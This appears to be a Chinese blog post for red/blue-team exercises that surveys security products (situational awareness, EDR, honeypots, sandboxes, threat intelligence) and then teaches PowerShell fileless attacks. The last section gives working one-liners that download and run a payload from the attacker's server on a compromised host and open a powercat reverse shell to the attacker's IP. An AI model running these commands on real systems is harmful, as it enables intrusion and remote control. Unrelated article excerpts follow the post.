2024HW --> 安全产品 Powershell无文件落地攻击

在HW中,除了了解中间件,web漏洞,这些攻击的手法,还得了解应急响应,安全产品,入侵排查,溯源反制...... 那么今天,就来说一下安全产品(安全公司我就不说了,这个大家都知道)

目录

1.态势感知

2.EDR

3.蜜罐

4.沙箱

5.威胁情报平台

6.Powershell无文件落地攻击!!!


1.态势感知

所谓的态势感知,就是我们在电视剧或者电影中经常见到的大屏幕上的画面(对没错,就是这样,十分的酷炫)

通过态势感知系统,我们可以清晰的看见攻击的来源以及攻击方法以及攻击的时间等等..... 

像深信服的SIP态势感知系统,就是一个很好的态势感知案例(真的一目了然)

其工作原理就是通过在各个子公司,或者办公区的核心交换机上面装一个探针,然后将通过交换机的流量进行copy一份,然后实时传输到态势感知的系统上面,供响应的人员进行查看

大概就是这样

2.EDR

EDR(Endpoint Detection and Response)终端检测与响应分析

这个就是通过在你的办公的电脑上装一个软件,通过这样,将多台设备联合在一起,进行监控和实时探测的目的(难听一点就是监控着你每天在干嘛,有点那个啥的)

通过EDR,我们可以实现监视终端以检测可疑活动,并捕获可疑数据以进行安全取证及调查。

3.蜜罐

随着技术的发展,科技也是越来越成熟,蜜罐也是。(相信是每个黑客最痛恨的了吧)

比较出名的民用的蜜罐就应该是Hfish了吧

这个蜜罐挺厉害的,提供了各种如OA,gitlab,redis,以及一些出名端口如22,3306,7001等诱导黑客来攻击,当黑客攻击的时候,就"中了蜜罐"。

通过蜜罐,我们能获取黑客的IP(一般是代理),0DAY(能获得这个就收获大了),误导黑客的攻击方向,或者延缓他们的攻击脚步,当然了,说不定还能获取他们个人信息如手机号,微信号等等个人隐私(反正蜜罐效果还是不错的)

4.沙箱

这个的作用也很大,在日常生活中我们的好兄弟经常回给我们发一些如1个T的学习资料以及一些好看的东西等等!!

但是我们又不知道有没有病毒,那能怎么办呢??? 沙箱就诞生了

安全沙箱技术是一种用于隔离应用程序或进程的安全机制,它可以在计算机系统中创建一个受限的环境,以防止应用程序或进程对系统造成潜在的安全威胁

通过沙箱,我们可以对这个exe,文件等进行威胁分析,来查看它们是否会产生一些威胁的做法

就像这样

5.威胁情报平台

这个没什么说的,我直接推荐微步好吧(挺出名的)

你有什么子域名啊,ip啊,都可以往上面扔一下,说不定能得到一些对应的信息

好了,那么差不多咯???

不对   不能水文章,还得写点东西

那么就来讲一下一种很酷炫的攻击吧(从名字都知道很酷炫)

6.Powershell无文件落地攻击!!!

是不是听起来就很酷炫,那么下面我们就来讲解一下这个东西

传统的恶意软件(例如.exe)攻击感染一个系统之前会把恶意文件(例如exe)复制到目标磁盘中并修改注册表并连接到此文件来达到一个长期隐藏的目的,无文件落地攻击是指即不向磁盘写入可执行文件,而是以脚本形式存在计算机中的注册表子项目中,以此来躲避杀软的检测,那么绕过了传统防病毒(AV)寻找被保存到磁盘上的文件并扫描这些文件以确定它们是否恶意的查杀方法。

对于无文件落地攻击,一般分为以下这么几个步骤

1.远程加载恶意脚本
2.注入内存
3.写入注册表(或者自运行)

然而对于powershell

powershell作为微软windows系统自带的软件包,具有十分强大的功能,越来越多的攻击者选用powershell作为攻击手段。PowerShell的主要作用是从远程位置下载恶意文件到受害者主机中,然后使用诸如Start-Porcess、Invoke-Item或者Invoke-Expression(-IEX)之类的命令执行恶意文件,PowerShell也可以将远程文件直接下载到受害者主机内存中,然后从内存中执行

首先,我们来讲一下powershell无文件反弹shell

1.CS自带powershell_payload

这个反弹shell还是不错的!!!!

首先我们去生成一段powershell的payload,然后部署在我们自己的VPS

然后传上去,开一个http服务

然后我们去存在RCE的主机上直接执行以下的命令

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://你公网的ip:公网的端口/powershell.ps1'))"

而且在别人的服务器上面,是不会产生任何的文件的,这样,就能达到了无文件落地攻击的效果

2.NC联动powercat反弹shell

除了上面的做法,我们还可以通过nc来接受反弹的shell

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 你的公网ip -p 监听的端口 -e cmd

我们就能在公网看见我们的nc的shell了 

如果别人访问不到githu,那么我们最好就是去下载这个ps脚本吗,直接放在服务器上,效果也是一样的

除了以上,我们还有nishang配合powershell反弹shell ,Invoke-PowerShellTcp联动nc反弹shell

            

但是不管怎么样,我们都是通过powershell来实现了无文件落地的攻击的目的!!!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/543734.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

使用 ChatGPT-4 编码就像与一个醉酒的天才一起工作

我决定从头到尾使用 ChatGPT 来构建一个用于管理书签的 Chrome 扩展。在生成了 30,000 多行 JavaScript、HTML、CSS 和云后端后,我的收获是,使用 ChatGPT 进行编码就像与一个醉酒的编程天才一起工作:他很懒,患有记忆丧失&#xff…

二极管分类及用途

二极管分类及用途 通用开关二极管 特点:电流小,工作频率高 选型依据:正向电流、正向压降、功耗,反向最大电压,反向恢复时间,封装等 类型:BAS316 ; IN4148WS 应用电路: 说明:应用…

智能革命:未来人工智能创业的天地

智能革命:未来人工智能创业的天地 一、引言 在这个数字化迅速变革的时代,人工智能(AI)已经从一个边缘科学发展成为推动未来经济和社会发展的关键动力。这一技术领域的飞速进步,不仅影响着科技行业的每一个角落,更是为创业者提供了…

【python】python抓取古诗文内容保存(源码)【独一无二】

👉博__主👈:米码收割机 👉技__能👈:C/Python语言 👉公众号👈:测试开发自动化【获取源码商业合作】 👉荣__誉👈:阿里云博客专家博主、5…

Ubuntu-22.04安装KVM虚拟机并安装Windows10

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言一、KVM是什么?二、安装步骤1.检查虚拟化2.查看KVM虚拟化3.安装KVM4.启用后台进程5.添加用户组6.重启电脑 三、使用步骤1.添加虚拟机2.配置虚拟机3.…

高颜值登录页面(一键复制)

你好,我是云桃桃。 一个希望帮助更多朋友快速入门 WEB 前端的程序媛。大专生,一枚程序媛,感谢关注。回复 “前端基础题”,可免费获得前端基础 100 题汇总,回复 “前端工具”,可获取 Web 开发工具合集 266篇…

leecode438 | 找到所有字符串中的异位词

题意大致是&#xff0c;给定两个字符串&#xff0c;s 和 p 其中 要在s 中找到由p的元素组成的子字符串&#xff0c;记录子字符串首地址 class Solution { public:vector<int> findAnagrams(string s, string p) {int m s.size(), n p.size();if(m < n)return {};vec…

python botos s3 aws

https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/s3.html AWS是亚马逊的云服务&#xff0c;其提供了非常丰富的套件&#xff0c;以及支持多种语言的SDK/API。本文针对其S3云储存服务的Python SDK&#xff08;boto3&#xff09;的使用进行介绍。 …

每日一题——阶乘计算升级版

题目链接&#xff1a; 6-10 阶乘计算升级版 - 基础编程题目集 (pintia.cn) 题目&#xff1a; 6-10 阶乘计算升级版 分数 20 本题要求实现一个打印非负整数阶乘的函数。 函数接口定义&#xff1a; void Print_Factorial ( const int N ); 其中N是用户传入的参数&#xff…

解锁智能未来:用Ollama开启你的本地AI之旅

Ollama是一个用于在本地运行大型语言模型&#xff08;LLM&#xff09;的开源框架。它旨在简化在Docker容器中部署LLM的过程&#xff0c;使得管理和运行这些模型变得更加容易。Ollama提供了类似OpenAI的API接口和聊天界面&#xff0c;可以非常方便地部署最新版本的GPT模型并通过…

商业银行业务与管理

商业银行业务与管理 资产负债表恒等式中国商业银行的资产负债表商业银行的业务种类银行运行管理的案例银行管理的基本准则流动性管理资产和负债管理资本充足管理 资产负债表恒等式 &#xff08;一般&#xff09;资产负债所有者权益 一个公司的资产是由负债和所有者权益所构成…

欧拉回路算法

1 基本概念 1.1 欧拉路径和欧拉回路 欧拉路径&#xff1a;欧拉路是指从图中任意一个点开始到图中任意一个点结束的路径&#xff0c;并且图中每条边通过的且只通过一次。 欧拉回路:欧拉回路是指起点和终点相同的欧拉路。 注意&#xff1a;如果欧拉回路&#xff0c;那么一定存在…

策略模式【行为模式C++】

1.概述 策略模式是一种行为设计模式&#xff0c; 它能让你定义一系列算法&#xff0c; 并将每种算法分别放入独立的类中&#xff0c; 以使算法的对象能够相互替换。 策略模式通常应用于需要多种算法进行操作的场景&#xff0c;如排序、搜索、数据压缩等。在这些情况下&#x…

【C++]C/C++的内存管理

这篇博客将会带着大家解决以下几个问题 1. C/C内存分布 2. C语言中动态内存管理方式 3. C中动态内存管理 4. operator new与operator delete函数 5. new和delete的实现原理 6. 定位new表达式(placement-new) 1. C/C内存分布 我们先来看下面的一段代码和相关问题 int global…

Unity 通过权重做随机

我们可以通过Random.Range方法结合权重来实现随机选择。具体步骤如下&#xff1a; 首先&#xff0c;创建一个数组&#xff0c;其中包含你要选择的项目&#xff0c;并为每个项目分配一个权重值。 计算所有权重值的总和。 使用Random.Range生成一个介于0和总权重之间的随机数。…

Hadoop+Spark大数据技术(微课版)曾国荪、曹洁版思维导图第四次作业 (第4章 HBase分布式DB)

1.简述Hbase的特点及与传统关系数据库的区别 HBase与传统关系数据库的区别 &#xff08;1&#xff09;数据类型 关系数据库具有丰富的数据类型&#xff0c;如字符串型、数值型、日期型、二进制型等。HBase只有字符串数据类型&#xff0c;数据的实际类型都是交由用户自己编写程序…

Google Imagen 2对比OpenAI的Dall-E 3 - 同一提示,不同结果

每周跟踪AI热点新闻动向和震撼发展 想要探索生成式人工智能的前沿进展吗&#xff1f;订阅我们的简报&#xff0c;深入解析最新的技术突破、实际应用案例和未来的趋势。与全球数同行一同&#xff0c;从行业内部的深度分析和实用指南中受益。不要错过这个机会&#xff0c;成为AI领…

python怎么输出小数

先将整型转换成float型&#xff0c;再进行计算&#xff0c;结果就有小数了。 >>> a 10 >>> b 4 >>> c a/b >>> a,b,c (10, 4, 2) >>> a float(a) >>> d a/b >>> a,b,d (10.0, 4, 2.5) >>> 注意&…

1036: 寻找整数序列的主元素

解法&#xff1a; #include<iostream> #include<vector> #include<algorithm> using namespace std; int main() {int n;cin >> n;vector<int> arr(n);vector<int> tong(1000);for (auto& x : arr) {cin >> x;tong[x];}int pma…

如何在Windows安装LocalSend并结合内网穿透实现公网跨平台远程文件互传

文章目录 1. 在Windows上安装LocalSend2. 安装Cpolar内网穿透3. 公网访问LocalSend4. 固定LocalSend公网地址 本篇文章介绍在Windows中部署开源免费文件传输工具——LocalSend&#xff0c;并且结合cpolar内网穿透实现公网远程下载传输文件。 localsend是一款基于局域网的文件传…